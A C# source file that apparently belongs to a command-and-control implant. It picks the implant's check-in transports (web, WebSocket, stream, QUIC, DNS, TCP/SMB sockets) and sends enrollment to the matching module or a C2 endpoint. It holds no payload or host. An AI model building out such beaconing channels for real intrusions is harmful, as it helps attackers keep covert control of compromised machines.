// <auto-generated>
//   This file is replaced by the .NET build unit at generation time: the unit
//   materializes the per-build transport selection into the staging copy,
//   naming only the check-in modules whose source files the bake compiled in
//   (architecture.md Sec 8) and dropping the others whole. This checked-in
//   default names every module so the implant compiles and runs on its
//   own (dev runs) against any URL shape and either mode.
// </auto-generated>
namespace Rod.Implant.Internal;

internal static class TransportSelection
{
    public static ICheckInClient[] CreateClients(CheckInSetup setup) =>
    [
        WebCheckIn.Create(setup),
        WsCheckIn.Create(setup),
        StreamCheckIn.Create(setup),
        QuicCheckIn.Create(setup),
        DnsCheckIn.Create(setup),
        SocketCheckIn.Create(setup),
    ];

    // The enroll dispatch the URL shape picks (architecture.md Sec 8,
    // enrollment over QUIC, the stream check-in, and the DNS grammar): an
    // http(s) enroll URL runs the JSON enroll cycle; a quic-, socket-
    // (tcp://, smb://), or dns-schemed one runs the frame exchange its
    // module dials. The generated per-build selection keeps only the
    // branches whose modules compiled.
    public static async Task<Enrollment> EnrollAsync(EnrollDial dial, CancellationToken cancellationToken = default) =>
        BeaconUrl.IsQuic(dial.EnrollUrl)
            ? await QuicEnroll.EnrollAsync(dial, cancellationToken)
            : BeaconUrl.IsSocket(dial.EnrollUrl)
                ? await SocketEnroll.EnrollAsync(dial, cancellationToken)
                : BeaconUrl.IsDns(dial.EnrollUrl)
                    ? await DnsEnroll.EnrollAsync(dial, cancellationToken)
                    : await C2.EnrollAsync(dial, cancellationToken);
}
